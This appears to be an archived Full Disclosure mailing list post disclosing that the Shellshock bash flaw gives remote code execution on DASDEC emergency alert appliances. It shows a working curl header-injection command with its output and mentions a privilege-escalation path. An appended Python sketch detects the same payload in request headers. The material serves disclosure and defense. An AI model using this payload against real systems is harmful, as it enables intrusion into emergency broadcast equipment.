Full Disclosure mailing list archives
Re: Critical bash vulnerability CVE-2014-6271
From: Matt Hazinski <mhazinsk () vt edu>
Date: Fri, 26 Sep 2014 14:02:51 -0400
On Thu, Sep 25, 2014 at 02:39:55PM +0200, Philip Cheong wrote:
> Worse than heartbleed?
> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
> http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/
I'm able to get remote code execution via CVE-2014-6271 on the Digital Alert Systems DASDEC. This appliance is used by broadcasters to send and receive Emergency Alert System messages over IP and AFSK. Once authenticated, an attacker can interrupt broadcasts (via a relay) and play arbitrary audio over the airwaves.
Exploiting it only requires a malicious HTTP header:

curl -H 'X-Shell-Shock: () { :; }; /bin/echo vulnerable > /tmp/dumped_file' http://192.168.0.45/dasdec/dasdec.csp

[matt@WUVT-EAS ~]# cat /tmp/dumped_file
vulnerable

Commands are executed as the apache user, but privilege escalation can still be obtained through CVE-2009-2692 despite the vendor's recent cumulative security patch.
I suspect all versions of the DASDEC are vulnerable to this, although I only have a DASDEC-1EN running software version 2.0-2 to test.
--
Matt Hazinski
mhazinsk () vt edu
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
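
Added example, not part of the original post: a detection sketch that flags request headers carrying the bash function-definition prefix shown in the message above, separating values that start with `() {` from lookalikes that merely contain it. The request structure, function names and sample requests are assumptions constructed for illustration.

```python
import re

# Vulnerable bash treats an environment value as a function definition when it
# begins with the four bytes "() {"; CGI exports each request header as HTTP_*.
EXACT_PREFIX = "() {"
LOOSE = re.compile(r"\(\s*\)\s*\{")  # same shape with spacing variants, anywhere

# Constructed sample requests (hypothetical structure), not from a real capture.
SAMPLE_REQUESTS = [
    {"src": "198.51.100.7", "path": "/dasdec/dasdec.csp",
     "headers": {"User-Agent": "curl/7.29.0",
                 "X-Shell-Shock": "() { :; }; /bin/echo vulnerable > /tmp/dumped_file"}},
    {"src": "198.51.100.8", "path": "/index.html",
     "headers": {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)", "Accept": "*/*"}},
    {"src": "198.51.100.9", "path": "/app.js",
     "headers": {"Referer": "http://example.test/?cb=function() { return 1 }"}},
]

def classify(value):
    """Return 'high', 'low' or None for one header value."""
    v = value.strip()
    if v.startswith(EXACT_PREFIX):
        return "high"  # the form the bash function importer acts on
    if LOOSE.search(v):
        return "low"   # lookalike, e.g. JavaScript quoted in a Referer
    return None

def trailing_command(value):
    """Heuristic for triage: the text that follows the first closing brace."""
    _, _, rest = value.partition("}")
    return rest.lstrip("; ").strip()

def scan(requests):
    """Check every header of every request, since any header reaches the environment."""
    findings = []
    for req in requests:
        for name, value in req["headers"].items():
            level = classify(value)
            if level:
                findings.append({
                    "src": req["src"], "path": req["path"], "header": name,
                    "confidence": level,
                    "trailing": trailing_command(value) if level == "high" else "",
                })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

The header name is irrelevant to the match, so a rule keyed only on User-Agent or Referer would miss the custom header used in the message.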